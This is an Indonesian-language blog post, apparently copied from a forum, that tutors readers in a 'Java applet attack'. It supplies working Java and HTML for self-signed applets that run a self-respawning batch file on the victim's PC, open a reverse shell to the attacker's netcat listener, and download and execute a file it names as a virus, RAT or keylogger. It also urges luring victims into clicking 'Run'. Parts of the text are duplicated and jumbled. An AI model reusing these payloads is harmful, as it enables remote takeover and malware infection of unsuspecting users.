Saturday, November 27, 2010
JAVA APPLET ATTACK
1:44 AM | 
Posted by
Reza Elborneo
Assalamualaikum..
Sebelumnya mohon maaf klo newbie lancang buka thread baru..
cuma sekedar ingin berbagi
Tentunya teman2 sudah tidak asing dengan tampilan seperti ini, seperti saat mengaksess situs-situs game online java, File Manager Webmin, Foto Uploader Facebook, dll.
Sebelumnya mohon maaf klo newbie lancang buka thread baru..
cuma sekedar ingin berbagi
Tentunya teman2 sudah tidak asing dengan tampilan seperti ini, seperti saat mengaksess situs-situs game online java, File Manager Webmin, Foto Uploader Facebook, dll.
Yap,, itu adalah tampilan security warning saat pengecekan signature dari aplikasi java applet dari sumber yang tidak terpercaya. Bagi pengguna awam tentunya tidak akan peduli dengan peringatan2 seperti ini dan dengan lugu dan yakin akan mengklik "Run" agar aplikasi bisa berjalan. Bagaimana jika aplikasi applet nya merupakan aplikasi berbahaya? Nah.. berdasarkan keluguan user inilah kesempatan kita melakukan JAVA APPLET ATTACK.
Lebih jelas tentang apa itu Java Applet http://id.wikipedia.org/wiki/Java_applet
Oke.. cukup intro nya, sekarang saatnya merakit senjata. Kita akan mulai dari senjata "Iseng-iseng" sampe "Serius" .
Bahan-bahan yang dibutuhkan:
Step Pembuatan Key
Sebelumnya kita buat dulu signature key palsu menggunakan keytool, key yang kita buat ini akan kita gunakan untuk membuat applet attack nantinya.
Masuk ke cmd ato terminal ketik :
Untuk sementara lewati dulu step-step COMPILE, JAR dan JARSIGNER dibawah ini biar gak bingung:
Step COMPILE
Lebih jelas tentang apa itu Java Applet http://id.wikipedia.org/wiki/Java_applet
Oke.. cukup intro nya, sekarang saatnya merakit senjata. Kita akan mulai dari senjata "Iseng-iseng" sampe "Serius" .
Bahan-bahan yang dibutuhkan:
- Java Development Kit
-Download : http://www.oracle.com/technetwork/java/javase/downloads/index.html
-Install : http://pentaho.phi-integration.com/instalasi-java/instalasi-java-windows - Web Hosting ( http://justfuckinggoogleit.com )
- Java Runtime Environment
-Download : http://www.java.com/en/download/inc/windows_upgrade_xpi.jsp
---------------------------------------------------------------------------------------------
Step Pembuatan Key
Sebelumnya kita buat dulu signature key palsu menggunakan keytool, key yang kita buat ini akan kita gunakan untuk membuat applet attack nantinya.
Masuk ke cmd ato terminal ketik :
keytool -genkey -keyalg rsa -alias namaaliasbebasSelanjutnya lanjutkan mengisi data-data yang ditentukan. Ingat selalu "namaaliasbebas", alias ini akan tetap kita gunakan nanti.
Untuk sementara lewati dulu step-step COMPILE, JAR dan JARSIGNER dibawah ini biar gak bingung:
Step COMPILE
Command :
Step JAR
Javac namafile.javaDari hasil compile akan terbentuk sebuah file namafile.class
Step JAR
Command :
Step JARSIGNER
Command :
Simpan file diatas dengan nama file neo.java. Lalu ikutkan langkah2 mulai dari Step COMPILE sampe Step JARSIGNER diatas. Perhatikan, sesuaikan "namafile" dengan yang telah ditentukan.
Tahap selanjutnya membuat file html yang berisi applet neo.jar.
Simpan dengan nama apaajah.html, lalu upload ke hostingan beserta file neo.jar dan neo.class dalam satu direktori hosting.
Selanjutnya saatya rayuan maut mu ke korban untuk browsing ke http://situshosting.nya/apaajah.html dan mengklik "Run".
Simple.. file ini akan membuat file neo.bat di C:\ yang berisi
Start C:\neo.bat
exit
Dan menjalankannya. Coba aja di "Run", ato jalankan file C:\neo.bat.. xixixi.. Lihat value dari parameter "cmd" di file html diatas. Silahkan bereeksplorasi.
/me gak bisa ambil screenCruut krn gak bakalan bisa ngapa2in klo file neo.bat dijalankan kecuali komputer di restart.. :capek::dead:
*REVERSE BACK CONNECT*
Aw..aw..aw.. udah mulai makin seru, kita akan melakukan back konek ke komputer korban untuk mendapatkan shell ato cmd korban. Efektif buat satu jaringan local, bisa aja sih buat jaringan lebih luas kaya internet yang penting kita punya IP Public dan koneksi yang wuzzzz tentunya..
Simpan file diatas dengan nama KonakBalik.java. Sama seperti sebelumnya, ikutkan langkah2 mulai dari Step COMPILE same Step JARSIGNER diatas.
Dan dibawah ini adalah file html nya yang akan menampung applet back konak.
Sebelum melancarkan aksi ini, jalankan dulu netcat di komputer kita dengan modus listening.
[*Sory gambar nya gak ke load*]
Interactive Command Prompt si korban kita dapatkan.. selanjutnya terserah mau diapain,, untuk mengakhiri sesi koneksi ketik "exit".
*DOWNLOAD AND EXECUTE*
Nah,, yg ini udah serius, applet yang akan kita buat akan mendownload file yg kita tentukan dan menjalankannya di computer korban. Bisa virus, BotNet, RAT, Keylogger, iStealer, dll.. saran ane file yg akan di download ukurannya jangan yang gede2.
Nama file "download.java", dan seperti biasa lakukan Step COMPILE > Step JAR > Step JARSIGNER. Hasilnya akan membentuk file download.jar, dan download.class yang siap kita upload nanti.
Dan ini file htmlnya..
Lalu Upload ke hosting bersama file download.jar dan download.class dalam satu direktori.
Outro:
Huff.. panjang juga yah :capek:,, Alasan knp ane bikin panjang2 sampe 3 contoh gini karena ane mau nunjukin klo JAVA APPLET ATTACK bisa dikembangkan jauh lebih bervariasi, bisa aja dijadikan cookie stealer, remote keylogger, DDOS attack dll..dll.. Hanya menurut pemikiran ane semata,
/me msh bego Java :malu:, cuma bisa 3 method ini
Nah mudah2an programmer2 java di HN bisa ngembangin lebih jauh dan sharing hasilnya kepada kita2.. :D
Kekurangannya java applet sangat sensi dengan koneksi, klo koneksi lemot agak lama load nya, kadang mesti di refresh baru applet nya ke load.
Mudah2an tutorial "singkat" ini bisa bermanfaat.. klo gak bermanfaat di buang aja :sedih:
Wassalamualaikum wr wb.
Jar cvf namafile.jar namafile.classOutput berupa file namafile.jar, yaitu file binary java yang sudah tercompres.
Step JARSIGNER
Command :
Jarsigner namafile.jar namaaliasbebas"namaaliasbebas" adalah nama alias pada Step Pembuatan Key sebelumnya. Jika lupa alias ini ketik "keytool –list". Jarsigner ini akan menambah signature key pada file namafile.jar yang kita buat pada Step JAR.
---------------------------------------------------------------------------------------------
JAVA APPLET ATTACK IN ACTION
*ISENG* Wind0zz User
Kita akan membuat user kewalahan dengan diam-diam membuat batch file yg bakalan bikin heboh dan panik dan lebay dan alay dan jijay dan.. di komputer korban dan menjalankannya, tapi gak ngerusak loh.
import java.applet.Applet;
import java.io.IOException;
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author Reza Elborneo
*/
public class neo extends Applet {
public void init() {
String win = getParameter("cmd");
String os = System.getProperty("os.name").toLowerCase();
if (os.indexOf("win") >= 0) {
try {
Process p = Runtime.getRuntime().exec(win);
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
Simpan file diatas dengan nama file neo.java. Lalu ikutkan langkah2 mulai dari Step COMPILE sampe Step JARSIGNER diatas. Perhatikan, sesuaikan "namafile" dengan yang telah ditentukan.
Tahap selanjutnya membuat file html yang berisi applet neo.jar.
<html>
<head>
<title>Welcome</title>
</head>
<body>
<br>
<div>
<applet width='100%' height='500' code='neo.class' archive='neo.jar'>
<param name='cmd' value='cmd.exe /c echo start C:neo.bat > C:neo.bat & echo exit >> C:neo.bat & start C:neo.bat'>
</applet>
</div>
</body>
</html>
Simpan dengan nama apaajah.html, lalu upload ke hostingan beserta file neo.jar dan neo.class dalam satu direktori hosting.
Selanjutnya saatya rayuan maut mu ke korban untuk browsing ke http://situshosting.nya/apaajah.html dan mengklik "Run".
Simple.. file ini akan membuat file neo.bat di C:\ yang berisi
Start C:\neo.bat
exit
Dan menjalankannya. Coba aja di "Run", ato jalankan file C:\neo.bat.. xixixi.. Lihat value dari parameter "cmd" di file html diatas. Silahkan bereeksplorasi.
/me gak bisa ambil screenCruut krn gak bakalan bisa ngapa2in klo file neo.bat dijalankan kecuali komputer di restart.. :capek::dead:
Aw..aw..aw.. udah mulai makin seru, kita akan melakukan back konek ke komputer korban untuk mendapatkan shell ato cmd korban. Efektif buat satu jaringan local, bisa aja sih buat jaringan lebih luas kaya internet yang penting kita punya IP Public dan koneksi yang wuzzzz tentunya..
import java.applet.Applet;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.net.UnknownHostException;
import java.util.logging.Level;
import java.util.logging.Logger;
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author Reza Elborneo
*/
public class KonakBalik extends Applet {
@Override
public void init() {
try {
Socket socket = new Socket(getParameter("host"), Integer.parseInt(getParameter("port")));
BufferedReader reader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
while (socket.isConnected()) {
writer.write("Neo@Victim $ ");
writer.flush();
String line = reader.readLine();
if (line == null) {
continue;
} else if (line.equals("exit")) {
reader.close();
writer.close();
socket.close();
System.exit(1);
} else {
Process p = Runtime.getRuntime().exec("cmd /c " + line);
// Kalo korbannya linux ganti "cmd /c" dengan "/bin/bash"
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String out = null;
while ((out = in.readLine()) != null) {
writer.write(out);
writer.newLine();
writer.flush();
}
}
}
} catch (UnknownHostException ex) {
Logger.getLogger(KonakBalik.class.getName()).log(Level.SEVERE, null, ex);
} catch (IOException ex) {
Logger.getLogger(KonakBalik.class.getName()).log(Level.SEVERE, null, ex);
}
}
}
Simpan file diatas dengan nama KonakBalik.java. Sama seperti sebelumnya, ikutkan langkah2 mulai dari Step COMPILE same Step JARSIGNER diatas.
Dan dibawah ini adalah file html nya yang akan menampung applet back konak.
<html>Edit "IP_ADDRESS" dengan IP komputer kita saat ini, Edit "PORT" terserah. Simpan dengan ekstensi .html lalu upload bersama file KonakBalik.jar dan KonakBalik.class
<head>
<title>Welcome</title>
</head>
<body>
<br>
<div>
<applet width='100%' height='500' code='KonakBalik.class' archive='KonakBalik.jar'>
<param name='host' value='IP_ADDRESS'>
<param name='port' value='PORT'>
</applet>
</div>
</body>
</html>
Sebelum melancarkan aksi ini, jalankan dulu netcat di komputer kita dengan modus listening.
nc –lvp PORTNYALancarkan aksi seperti sebelumnya dan saat korban masuk perangkap.. BINGGO!!
[*Sory gambar nya gak ke load*]
Interactive Command Prompt si korban kita dapatkan.. selanjutnya terserah mau diapain,, untuk mengakhiri sesi koneksi ketik "exit".
*DOWNLOAD AND EXECUTE*
Nah,, yg ini udah serius, applet yang akan kita buat akan mendownload file yg kita tentukan dan menjalankannya di computer korban. Bisa virus, BotNet, RAT, Keylogger, iStealer, dll.. saran ane file yg akan di download ukurannya jangan yang gede2.
import java.applet.Applet;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLConnection;
import java.util.logging.Level;
import java.util.logging.Logger;
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author Reza Elborneo
*/
public class download extends Applet {
public download() {
}
@Override
public void init() {
{
OutputStream out = null;
try {
String fileName = "virus.exe"; // nama file setelah di download
String path = "D:"; // Lokasi penyimpanan file yg akan di download
String link = getParameter("url");
URL url = new URL(link);
out = new BufferedOutputStream(new FileOutputStream(path + fileName));
URLConnection con = url.openConnection();
InputStream in = con.getInputStream();
byte[] buffer = new byte[in.available()];
int read;
while ((read = in.read(buffer)) != -1) {
out.write(buffer, 0, read);
}
out.flush();
in.close();
out.close();
} catch (IOException ex) {
Logger.getLogger(download.class.getName()).log(Level.SEVERE, null, ex);
} finally {
try {
out.close();
} catch (IOException ex) {
Logger.getLogger(download.class.getName()).log(Level.SEVERE, null, ex);
}
}
}
String os = System.getProperty("os.name").toLowerCase();
if (os.indexOf("win") >= 0) {
try {
Process com = Runtime.getRuntime().exec(getParameter("cmd"));
} catch (IOException e) {
}
}
}
}
Nama file "download.java", dan seperti biasa lakukan Step COMPILE > Step JAR > Step JARSIGNER. Hasilnya akan membentuk file download.jar, dan download.class yang siap kita upload nanti.
Dan ini file htmlnya..
<html>Sesuaikan value dari parameter "url" berisi dimana virus di hosting, sesuaikan value dari parameter "cmd" sesuai di file "download.java".
<head>
<title>Welcome</title>
</head>
<body>
<br>
<div>
<applet width='100%' height='500' code='download.class' archive='download.jar'>
<param name='url' value='http://situshosting.nya/virus.exe'>
<param name='cmd' value='cmd.exe /c start D:virus.exe'>
</applet>
</div>
</body>
</html>
Lalu Upload ke hosting bersama file download.jar dan download.class dalam satu direktori.
Outro:
Huff.. panjang juga yah :capek:,, Alasan knp ane bikin panjang2 sampe 3 contoh gini karena ane mau nunjukin klo JAVA APPLET ATTACK bisa dikembangkan jauh lebih bervariasi, bisa aja dijadikan cookie stealer, remote keylogger, DDOS attack dll..dll.. Hanya menurut pemikiran ane semata,
/me msh bego Java :malu:, cuma bisa 3 method ini
Nah mudah2an programmer2 java di HN bisa ngembangin lebih jauh dan sharing hasilnya kepada kita2.. :D
Kekurangannya java applet sangat sensi dengan koneksi, klo koneksi lemot agak lama load nya, kadang mesti di refresh baru applet nya ke load.
Mudah2an tutorial "singkat" ini bisa bermanfaat.. klo gak bermanfaat di buang aja :sedih:
Wassalamualaikum wr wb.
Labels:
